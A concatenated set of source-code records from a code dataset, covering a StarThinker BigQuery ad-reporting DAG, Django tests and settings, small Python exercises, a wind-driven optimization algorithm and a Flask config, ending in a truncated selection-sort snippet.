'query': 'WITH\r\nbrowser_clean AS (\r\n SELECT\r\n Advertiser,\r\n Advertiser_Id,\r\n Campaign,\r\n Campaign_Id,\r\n Browser_Platform,\r\n Activity,\r\n Activity_ID,\r\n CASE\r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Chrome).*") THEN "Chrome" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Firefox).*") THEN "Firefox" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Safari).*") THEN "Safari"\r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPad).*") THEN "Safari" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPad).*") THEN "Safari" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPhone).*") THEN "Safari" \r\n ELSE "Other"\r\n END AS Clean_Browser,\r\n Platform_Type,\r\n Report_Day,\r\n View_Through_Conversions,\r\n Click_Through_Conversions,\r\n Total_Conversions\r\n FROM [PARAMETER].CM_Browser_Floodlight\r\n)\r\n\r\n SELECT\r\n *,\r\n CASE WHEN Platform_Type="Mobile highend: smartphone" OR Platform_Type="Mobile midrange: feature phone" OR Platform_Type="Tablet" THEN Total_Conversions ELSE 0 END AS Mobile_Convs,\r\n CASE WHEN Platform_Type="Desktop" THEN Total_Conversions ELSE 0 END AS Desktop_Convs,\r\n CASE WHEN Clean_Browser="Chrome" THEN Total_Conversions ELSE 0 END AS Chrome_Convs,\r\n CASE WHEN Clean_Browser="Safari" THEN Total_Conversions ELSE 0 END AS Safari_Convs,\r\n CASE WHEN Clean_Browser="Firefox" THEN Total_Conversions ELSE 0 END AS Firefox_Convs\r\n FROM browser_clean',
'legacy': False,
'parameters': [
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Bigquery container for data.'
}
}
]
}
}
},
{
'bigquery': {
'auth': 'service',
'to': {
'table': 'CM_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
},
'from': {
'query': 'WITH\r\nbrowser_clean AS (\r\n SELECT\r\n Advertiser,\r\n Advertiser_Id,\r\n Campaign,\r\n Campaign_Id,\r\n Site_Dcm,\r\n Browser_Platform,\r\n CASE\r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Chrome).*") THEN "Chrome" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Firefox).*") THEN "Firefox" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Safari).*") THEN "Safari"\r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPad).*") THEN "Safari" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPad).*") THEN "Safari" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPhone).*") THEN "Safari" \r\n ELSE "Other"\r\n END AS Clean_Browser,\r\n Platform_Type,\r\n Report_Day,\r\n Impressions,\r\n Clicks,\r\n View_Through_Conversions,\r\n Click_Through_Conversions\r\n FROM [PARAMETER].CM_Browser_Delivery\r\n)\r\n\r\n SELECT\r\n *,\r\n CASE WHEN Platform_Type="Mobile highend: smartphone" OR Platform_Type="Mobile midrange: feature phone" OR Platform_Type="Tablet" THEN Impressions ELSE 0 END AS Mobile_Imps,\r\n CASE WHEN Platform_Type="Desktop" THEN Impressions ELSE 0 END AS Desktop_Imps,\r\n CASE WHEN Platform_Type="Connected TV" THEN Impressions ELSE 0 END AS CTV_Imps,\r\n CASE WHEN Clean_Browser="Chrome" THEN Impressions ELSE 0 END AS Chrome_Imps,\r\n CASE WHEN Clean_Browser="Safari" THEN Impressions ELSE 0 END AS Safari_Imps,\r\n CASE WHEN Clean_Browser="Firefox" THEN Impressions ELSE 0 END AS Firefox_Imps\r\n FROM browser_clean',
'legacy': False,
'parameters': [
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Bigquery container for data.'
}
}
]
}
}
},
{
'bigquery': {
'auth': 'service',
'to': {
'table': 'DV360_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
},
'from': {
'query': 'WITH\r\nbrowser_cleaned AS (\r\n SELECT \r\n Advertiser,\r\n Advertiser_Id,\r\n Advertiser_Currency,\r\n Browser,\r\n Campaign,\r\n Campaign_Id,\r\n Insertion_Order, \r\n Insertion_Order_Id,\r\n Report_Day,\r\n Device_Type,\r\n Environment,\r\n Impressions,\r\n Clicks,\r\n Post_Click_Conversions,\r\n Post_View_Conversions,\r\n Revenue_Adv_Currency as Revenue,\r\n Media_Cost_Advertiser_Currency,\r\n CASE\r\n WHEN REGEXP_CONTAINS(Browser, "((?i).*Chrome).*") THEN "Chrome" \r\n WHEN REGEXP_CONTAINS(Browser, "((?i).*Firefox).*") THEN "Firefox" \r\n WHEN REGEXP_CONTAINS(Browser, "((?i).*Safari).*") THEN "Safari"\r\n ELSE "Other"\r\n END AS Clean_Browser,\r\n CASE \r\n WHEN Browser="Safari 12" THEN "Safari 12"\r\n WHEN Browser="Safari 11" THEN "Safari 11"\r\n WHEN REGEXP_CONTAINS(Browser, "((?i).*Safari).*") AND Browser!="Safari 12" AND Browser!="Safari 11" THEN "Safari 10 & Below"\r\n ELSE "Non Safari"\r\n END AS ITP_Affected_Browsers\r\n FROM [PARAMETER].DV360_Browser_Delivery \r\n)\r\n\r\n SELECT\r\n *,\r\n CASE WHEN Device_Type="Smart Phone" OR Device_Type="Tablet" THEN Impressions ELSE 0 END AS Mobile_Imps,\r\n CASE WHEN Device_Type="Desktop" THEN Impressions ELSE 0 END AS Desktop_Imps,\r\n CASE WHEN Device_Type="Connected TV" THEN Impressions ELSE 0 END AS CTV_Imps,\r\n CASE WHEN Clean_Browser="Chrome" THEN Impressions ELSE 0 END AS Chrome_Imps,\r\n CASE WHEN Clean_Browser="Safari" THEN Impressions ELSE 0 END AS Safari_Imps,\r\n CASE WHEN Clean_Browser="Firefox" THEN Impressions ELSE 0 END AS Firefox_Imps,\r\n CASE WHEN Clean_Browser="Chrome" THEN Revenue ELSE 0 END AS Chrome_Rev,\r\n CASE WHEN Clean_Browser="Safari" THEN Revenue ELSE 0 END AS Safari_Rev,\r\n CASE WHEN Clean_Browser="Firefox" THEN Revenue ELSE 0 END AS Firefox_Rev,\r\n CASE WHEN Clean_Browser="Chrome" THEN Post_Click_Conversions ELSE 0 END AS Chrome_Click_Convs,\r\n CASE WHEN Clean_Browser="Safari" THEN Post_Click_Conversions ELSE 0 END AS Safari_Click_Convs,\r\n CASE WHEN 
Clean_Browser="Firefox" THEN Post_Click_Conversions ELSE 0 END AS Firefox_Click_Convs,\r\n CASE WHEN Clean_Browser="Chrome" THEN Post_View_Conversions ELSE 0 END AS Chrome_View_Convs,\r\n CASE WHEN Clean_Browser="Safari" THEN Post_View_Conversions ELSE 0 END AS Safari_View_Convs,\r\n CASE WHEN Clean_Browser="Firefox" THEN Post_View_Conversions ELSE 0 END AS Firefox_View_Convs,\r\n CASE WHEN Clean_Browser="Chrome" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS Chrome_Convs,\r\n CASE WHEN Clean_Browser="Safari" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS Safari_Convs,\r\n CASE WHEN Clean_Browser="Firefox" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS Firefox_Convs,\r\n \r\n CASE WHEN ITP_Affected_Browsers="Safari 12" THEN Impressions ELSE 0 END AS S12_Imps,\r\n CASE WHEN ITP_Affected_Browsers="Safari 11" THEN Impressions ELSE 0 END AS S11_Imps,\r\n CASE WHEN ITP_Affected_Browsers="Safari 10 & Below" THEN Impressions ELSE 0 END AS S_Imps,\r\n CASE WHEN ITP_Affected_Browsers="Non Safari" THEN Impressions ELSE 0 END AS NS_Imps,\r\n \r\n CASE WHEN ITP_Affected_Browsers="Safari 12" THEN Post_Click_Conversions ELSE 0 END AS S12_Click_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 11" THEN Post_Click_Conversions ELSE 0 END AS S11_Click_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 10 & Below" THEN Post_Click_Conversions ELSE 0 END AS S_Click_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Non Safari" THEN Post_Click_Conversions ELSE 0 END AS NS_Click_Convs,\r\n \r\n CASE WHEN ITP_Affected_Browsers="Safari 12" THEN Post_View_Conversions ELSE 0 END AS S12_View_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 11" THEN Post_View_Conversions ELSE 0 END AS S11_View_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 10 & Below" THEN Post_View_Conversions ELSE 0 END AS S_View_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Non Safari" THEN Post_View_Conversions ELSE 0 END AS NS_View_Convs,\r\n \r\n CASE WHEN 
ITP_Affected_Browsers="Safari 12" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS S12_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 11" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS S11_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 10 & Below" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS S_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Non Safari" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS NS_Convs\r\n \r\n \r\n FROM browser_cleaned',
'legacy': False,
'parameters': [
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Place where tables will be written in BigQuery.'
}
}
]
}
}
},
{
'bigquery': {
'auth': 'service',
'to': {
'table': 'Combined_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
},
'from': {
'query': 'WITH cm AS ( SELECT Report_Day, CASE WHEN Platform_Type="Desktop" THEN "Desktop" WHEN Platform_Type="Tablet" THEN "Mobile_Tablet" WHEN Platform_Type="Mobile highend: smartphone" THEN "Mobile_Tablet" WHEN Platform_Type="Mobile midrange: feature phone" THEN "Mobile_Tablet" WHEN Platform_Type="Connected TV" THEN "CTV" END AS Device_Clean, SUM(Impressions) as CM_Impressions FROM `[PARAMETER].CM_Browser_Delivery` GROUP BY 1,2 ), dv3 AS ( SELECT Report_Day as RD, CASE WHEN Device_Type="Desktop" THEN "Desktop" WHEN Device_Type="Tablet" THEN "Mobile_Tablet" WHEN Device_Type="Smart Phone" THEN "Mobile_Tablet" WHEN Device_Type="Connected TV" THEN "CTV" END AS Device_Clean_DV360, SUM(Impressions) as DV360_Impressions FROM `[PARAMETER].DV360_Browser_Delivery` GROUP BY 1,2 ) SELECT Report_Day, Device_Clean, CM_Impressions, DV360_Impressions FROM cm a JOIN dv3 b ON a.Report_Day=b.RD AND a.Device_Clean=b.Device_Clean_DV360',
'legacy': False,
'parameters': [
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Place where tables will be written in BigQuery.'
}
},
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Place where tables will be written in BigQuery.'
}
}
]
}
}
}
]
# Build the Airflow DAG from the StarThinker recipe; 'itp' is the DAG id prefix.
DAG_FACTORY = DAG_Factory('itp', { 'tasks':TASKS }, INPUTS)
# NOTE(review): 'apply_credentails' (sic) appears to be the method name exposed
# by starthinker_airflow.factory - the misspelling is upstream; verify before
# "fixing" it here.
DAG_FACTORY.apply_credentails(USER_CONN_ID, GCP_CONN_ID)
DAG = DAG_FACTORY.execute()
# When executed directly, print the equivalent StarThinker command line.
if __name__ == "__main__":
  DAG_FACTORY.print_commandline()
| [
"kenjora@google.com"
] | kenjora@google.com |
9f52c25f81a9401c049a07ab2f0d2bf4f56c2f38 | b87b4f2ad90390e6dcb53f258077ea6fea574f6c | /tests/test_models/test_user_model.py | 86f00ff5b9e2c85d4cf23f0173349b8b234bc5ee | [] | no_license | Wassally/backend | 1b73510ee451d433c1f747be5356c4e11b6e914a | 01071eb94ecfc3a3b260ae957a0aa638271c66b1 | refs/heads/master | 2022-11-26T13:24:01.684833 | 2019-06-30T06:02:29 | 2019-06-30T06:02:29 | 177,253,039 | 2 | 0 | null | 2022-11-22T03:30:11 | 2019-03-23T06:29:15 | Python | UTF-8 | Python | false | false | 805 | py | from django.test import TestCase
from api.factories import ClientFactory, CaptainFactory
from api.models import User, Captain
class ClientTest(TestCase):
    """Tests for client users produced by ClientFactory."""

    def test_creation_client(self):
        # A factory-built client is an ordinary User instance.
        client = ClientFactory()
        self.assertIsInstance(client, User)
        # __str__ renders as "<id>: <username>".
        expected = "%d: %s" % (client.id, client.username)
        self.assertEqual(str(client), expected)
        # Role flags: marked as client, not as captain.
        self.assertTrue(client.is_client)
        self.assertFalse(client.is_captain)
class CaptainTest(TestCase):
    """Tests for captain profiles produced by CaptainFactory."""

    def test_creation_captain(self):
        captain = CaptainFactory()
        self.assertIsInstance(captain, Captain)
        # Captains stringify as the related user's username.
        self.assertEqual(str(captain), captain.user.username)
        # Role flags live on the related user record.
        self.assertTrue(captain.user.is_captain)
        self.assertFalse(captain.user.is_client)
| [
"mahmoudzeyada440@gmail.com"
] | mahmoudzeyada440@gmail.com |
c6269e4c4cbe33348216a4e40f8dd8589429c416 | 0b49bc0a9df47f88bf687d18f723620bd62c3957 | /vrtech/src/vrtechgeeks/settings/production.py | 414754a29693d8b395689a9ab9ee78339bf3b1a1 | [] | no_license | vikky1993/DjangoPractice | 07f36f4b9132290a70f22997d99b37b1ca7c9685 | 434513927059cd452b7c9cd5947a3e876209f3cd | refs/heads/master | 2021-04-27T00:23:07.159792 | 2018-03-15T18:15:45 | 2018-03-15T18:15:45 | 123,803,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,129 | py | """
Django settings for vrtechgeeks project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is hard-coded in a *production* settings module - move
# it to an environment variable (e.g. os.environ['SECRET_KEY']) before deploying.
SECRET_KEY = '%=n&c2^_d5=nk==-&l_*((ms68r=q67vddn(*t#hfet#j)e9+#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
# NOTE(review): with DEBUG = False Django rejects every request while
# ALLOWED_HOSTS is empty - the real deployment host names must be listed here.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'vrtechgeeks.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'vrtechgeeks.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# NOTE(review): SQLite is rarely appropriate for a production deployment;
# confirm whether this settings module should point at a server database.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"wickee0810@gmail.com"
] | wickee0810@gmail.com |
bb0efe67dfd3c78cf14534fae1ece53c7496dc21 | 9285ad640b5eab4efd268575690a0a6f5fa42973 | /8/8-1.py | 2107b09b762c208f5c430974c15d66760080fc5b | [] | no_license | dengdengkai/Python_practise | d8d2935ed7981bdaa06cc86881912e3a76ff3aba | 2750ebf0a53b1fee24a3399b77505f0b0146d733 | refs/heads/master | 2020-03-26T07:23:32.766902 | 2018-08-17T08:35:40 | 2018-08-17T08:35:40 | 144,652,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | #!/usr/bin/env python
#coding: UTF-8
"""
题目:编写input()和output()函数输入,输出5个学生的数据记录。
程序分析:无。
"""
class Student:
    """Record of one student's name, age and four exam scores.

    BUG FIX: the original declared name/age/score as *class* attributes, so
    every Student shared a single mutable `score` list; they are now created
    per instance in __init__.
    """

    def __init__(self):
        self.name = ""
        self.age = 0
        self.score = [None] * 4

    def input(self):
        """Read name, age and the four scores from the console."""
        self.name = raw_input("Input name,please:")
        self.age = int(raw_input("Input age,please:"))
        for i in range(len(self.score)):
            self.score[i] = int(raw_input("Input %d score,please: " % (i + 1)))

    def output(self):
        """Print the stored record in the same order it was read."""
        # Single-argument print(...) emits identical output under Python 2
        # (the file's original dialect) and parses under Python 3.
        print('Output name: %s' % self.name)
        print('Output age: %d' % self.age)
        for i in range(len(self.score)):
            print('Output %d score: %d' % ((i + 1), self.score[i]))
if __name__ == '__main__':
    N = 5
    # BUG FIX: the original `[Student()] * N` built five references to a
    # single instance, so each record overwrote the previous one; build N
    # independent students instead.
    students = [Student() for _ in range(N)]
    for student in students:
        student.input()
    for student in students:
        student.output()
| [
"1115132936@qq.com"
] | 1115132936@qq.com |
c6c56c4c86be2360dc24af49f82fbc2fe890e140 | 21de9bc6f4d4584d2fd385359d76a005ff66aa48 | /tests/test_loading.py | f569886d65a330e7608419dc66aa67f62e9eaa01 | [] | no_license | minorsecond/GIS-Helper | 33cbbe193266acddab99ff55c1bb540a26c83713 | 29dbedbde3caa4436f4b5933b9f10cb87ce47ef2 | refs/heads/master | 2021-05-24T04:01:32.967888 | 2020-09-12T11:07:07 | 2020-09-12T11:07:07 | 63,873,429 | 0 | 0 | null | 2020-10-31T10:37:11 | 2016-07-21T13:51:09 | Python | UTF-8 | Python | false | false | 439 | py | # Test loading of shapefiles and rasters
from vector import meta
import shapefile
def test_load_shapefile():
    """Loading the Texas fixture yields a pyshp Shapes collection."""
    input_payload = ["", "tests\\test_data\\texas.shp", ""]
    shapefile_functions = meta.PolygonFunctions()
    shp = shapefile_functions.load_polygons(input_payload)
    # isinstance is the idiomatic type check; `type(x) == T` needlessly
    # rejects subclasses and is flagged by linters (E721).
    assert isinstance(shp, shapefile.Shapes)
def test_load_raster():
    # Stub: only names the fixture raster; loading and assertions are missing.
    input_payload = "tests\\test_data\\i30dem.tif"
    # TODO: Write the raster load code
| [
"minorsecond@gmail.com"
] | minorsecond@gmail.com |
b036d6fd8e95f539ae982a23cf985148ad491aca | bcabce262e54a6ac38948a4717254cdc3ce65874 | /mealpy/physics_based/WDO.py | 3e376916b7ec257ba7469ad4a3260e10a7cdabce | [
"MIT"
] | permissive | ibrahim85/MEta-heuristics-ALgorithms-in-PYthon | 4ab6e6ef54127b6f4721178a1f855d1be91f9b42 | 47fb428e8378fc52cd5fe6eff20cec1c68ba5039 | refs/heads/master | 2023-06-03T05:23:31.993100 | 2021-06-28T14:48:38 | 2021-06-28T14:48:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,794 | py | #!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 21:18, 17/03/2020 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, randint
from numpy import ones, clip
from mealpy.root import Root
class BaseWDO(Root):
    """
    The original version of: Wind Driven Optimization (WDO).

    Reference:
        The Wind Driven Optimization Technique and its Application in Electromagnetics
        https://ieeexplore.ieee.org/abstract/document/6407788
    """
    def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
                 RT=3, g=0.2, alp=0.4, c=0.4, max_v=0.3, **kwargs):
        # Root takes the kwargs dict as a positional parameter here.
        super().__init__(obj_func, lb, ub, verbose, kwargs)
        self.epoch = epoch          # number of optimization iterations
        self.pop_size = pop_size    # number of air parcels (candidate solutions)
        self.RT = RT  # RT coefficient (pull toward the global best)
        self.g = g  # gravitational constant
        self.alp = alp  # friction constant in the velocity update equation
        self.c = c  # coriolis effect coefficient
        self.max_v = max_v  # maximum allowed speed (velocity is clipped to it)
    def train(self):
        """
        Run the WDO loop; returns (best_position, best_fitness, loss_history).

        # pop is the set of "air parcel" - "position"
        # air parcel: is the set of gas atoms . Each atom represents a dimension in position and has its own velocity
        # pressure represented by fitness value
        """
        pop = [self.create_solution() for _ in range(self.pop_size)]
        g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
        # One velocity vector per parcel; magnitudes are capped to max_v below.
        list_velocity = self.max_v * uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
        for epoch in range(self.epoch):
            # Update velocity based on random dimensions and position of global best
            for i in range(self.pop_size):
                # Coriolis-style term: one randomly chosen velocity component
                # broadcast across every dimension.
                rand_dim = randint(0, self.problem_size)
                temp = list_velocity[i][rand_dim] * ones(self.problem_size)
                # New velocity = friction (1 - alp) * old velocity
                #                - gravity term proportional to the current position
                #                + attraction toward the global best (RT-weighted)
                #                + coriolis term scaled by c; the last two are
                #                index-dependent through (i + 1).
                vel = (1 - self.alp)*list_velocity[i] - self.g * pop[i][self.ID_POS] + \
                      (1 - 1.0/(i+1)) * self.RT * (g_best[self.ID_POS] - pop[i][self.ID_POS]) + self.c * temp / (i+1)
                vel = clip(vel, -self.max_v, self.max_v)
                # Update air parcel positions, check the bound and calculate pressure (fitness)
                pos = pop[i][self.ID_POS] + vel
                pos = self.amend_position_faster(pos)
                fit = self.get_fitness_position(pos)
                pop[i] = [pos, fit]
                list_velocity[i] = vel
                ## batch size idea: refresh the tracked global best every
                ## batch_size (or pop_size) evaluations rather than each step.
                if self.batch_idea:
                    if (i + 1) % self.batch_size == 0:
                        g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
                else:
                    if (i + 1) % self.pop_size == 0:
                        g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
            self.loss_train.append(g_best[self.ID_FIT])
            if self.verbose:
                print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
        self.solution = g_best
        return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| [
"nguyenthieu2102@gmail.com"
] | nguyenthieu2102@gmail.com |
7896bf7d5c6ab4689d3061e5426418964b6eaa21 | 8b29b6176314d40ac11d0adb33e5b89c16c5679d | /tests/Zadanie1_tests/test_FileEdit.py | 5a51bb1dc8ff4df9f0e3b192556cfc4fa759e552 | [
"MIT"
] | permissive | TestowanieAutomatyczneUG/laboratorium-11-LudwikaMalinowska | c276e1d5c6d1fcfa85ee3556e155c1c369bb2fbb | 1e1bd74c0d098336773d5a7cda8def04bb5f0f0f | refs/heads/main | 2023-02-01T17:30:08.642811 | 2020-12-18T22:58:03 | 2020-12-18T22:58:03 | 322,655,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | from unittest import mock
from unittest.mock import Mock, call, mock_open, patch
import unittest
from Zadanie1.FileEdit import FileEdit
class TestFileEdit(unittest.TestCase):
    """Unit tests for FileEdit with all filesystem access mocked out."""

    def setUp(self):
        self.temp = FileEdit()

    def test_open_file(self):
        # open_file returns the file's full contents.
        path = "plik.txt"
        opener = mock_open(read_data="abc")
        with patch('builtins.open', opener):
            content = self.temp.open_file(path)
        self.assertEqual(content, "abc")

    def test_edit_file(self):
        # edit_file must reopen the target file in write mode.
        path = "plik.txt"
        opener = mock_open(read_data="abc")
        with patch('builtins.open', opener):
            self.temp.edit_file(path, "def")
            opener.assert_called_once_with(path, "w")

    @mock.patch('Zadanie1.FileEdit.os.path')
    @mock.patch('Zadanie1.FileEdit.os')
    def test_delete_file(self, mock_os, mock_path):
        # With os.path.exists forced True, delete_file must call os.remove.
        path = "plik.txt"
        mock_path.exists.return_value = True
        self.temp.delete_file(path)
        mock_os.remove.assert_called_with(path)

    def tearDown(self):
        self.temp = None
if __name__ == '__main__':
unittest.main() | [
"malinowska.L@wp.pl"
] | malinowska.L@wp.pl |
a13e485cf2a845c87a8f08906bd0f2887847cf2d | d8a0b8d3926d200a79309844946162becd15018b | /manipulando.textos-transformaçao.py | 05e1851498033973d272da74faffba87c032a43a | [] | no_license | GustavoBonet/python.teste | 37f59d07591a7085ac3b3b0ccbe8cc3e8664170f | 1bbec386be6eba2b679eaed742f1d32eb89001d4 | refs/heads/master | 2023-03-12T08:56:33.458494 | 2021-03-05T11:52:35 | 2021-03-05T11:52:35 | 327,271,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | frase = str(input('Digite a frase:')).rstrip()
# rstrip() above removes trailing whitespace (lstrip() would remove leading).
print(frase.replace('diamante', 'ouro'))
# replace: every occurrence of 'diamante' becomes 'ouro'.
print(frase.upper())
# upper: whole phrase in uppercase.
print(frase.lower())
# lower: whole phrase in lowercase.
print(frase.capitalize())
# capitalize: only the first letter of the phrase in uppercase.
print(frase.title())
# title: first letter of every word in uppercase.
print(frase.split())
# split: list of the words, split on runs of whitespace.
| [
"55928208+GustavoBonet@users.noreply.github.com"
] | 55928208+GustavoBonet@users.noreply.github.com |
d3d04dbfb5c8f459adb169cdcf503bdc3d9f717c | 57bfbcb5fd7c0b13909150032ac7d29462dafc1c | /0610/ex.01.py | 4bd1111de480b6f19766b359806ca49f722439cc | [] | no_license | hoo159/Programing | ac8a5f5e58cc51d4d8558055cb8454da047346ea | 97268c097d94b3b6721c6e85a640093834a25ceb | refs/heads/master | 2022-11-14T19:15:46.032238 | 2020-07-08T14:29:09 | 2020-07-08T14:29:09 | 263,524,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | i=0
# Running total of the odd numbers 1, 3, 5, 7, 9: print each value together
# with the cumulative sum so far.
s=0
for i in range(1,10,2):
    s += i
    print(i, s)
| [
"noreply@github.com"
] | hoo159.noreply@github.com |
04c56cd4ec6d55d958326bdeccd11c0de6f926e3 | 1999b5219dd4266ebae1dc54d1c9df72aebaf41e | /TI/Code/flaskdemo/app/config.py | a6b05b8c7faaaaaf678ea334c5a31e30ab6a3d98 | [] | no_license | Garfield247/dmp_test | a6c6a860517171403f4b49292c7f8e424ad87241 | b0f104200990c09054e958b556fb6ca28c14c9ef | refs/heads/master | 2021-05-20T00:34:55.747018 | 2020-04-13T06:13:40 | 2020-04-13T06:13:40 | 252,109,165 | 0 | 0 | null | 2021-02-02T22:35:57 | 2020-04-01T07:56:05 | JavaScript | UTF-8 | Python | false | false | 1,050 | py | import os
base_dir = os.path.abspath(os.path.dirname(__file__))
class Config():
# 系统秘钥 设置从服务器环境变量获取或者使用shtddsj123.
SECRET_KEY = os.environ.get("SECRET_KEY") or "shtddsj123."
# 数据库相关设置
SQLALCHEMY_TRACK_MODIFICATIONS = True
SQLALCHEMY_COMMIT_ON_REARDOWN = True
UPLOADED_PATH = os.path.join(base_dir,"uploads")
# CELERY_BROKER_URL='redis://0.0.0.0:6379/0'
# CELERY_RESULT_BACKEND='redis://0.0.0.0:6379/0'
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(base_dir,"dmp-dev.sqlite")
class TestingConfig(Config):
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(base_dir,"dmp-test.sqlite")
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(base_dir,"dmp-pro.sqlite")
config = {
'development':DevelopmentConfig,
'testing':TestingConfig,
'production':ProductionConfig,
'default':DevelopmentConfig,
}
| [
"garfield_lv@163.com"
] | garfield_lv@163.com |
833d370e27227a2379930e7622fb9f9e1f88c634 | f6c78384b04e1f3bf286fae9b0e2a71e8c448727 | /选择排序.py | 1e59a51c49e9980c0413e2e13c32e7ee124631ac | [] | no_license | Waycc/algorithm | 72c9eb05e29a035ae510ce2f3a10c35748436796 | 55d26da661313b23e93cd716c4859c294e0fccb6 | refs/heads/master | 2021-08-10T19:12:02.996924 | 2020-03-22T14:29:01 | 2020-03-22T14:29:01 | 131,179,762 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | import random
lst = [random.randint(1,1000) for i in range(100)]
for i in range(len(lst)):
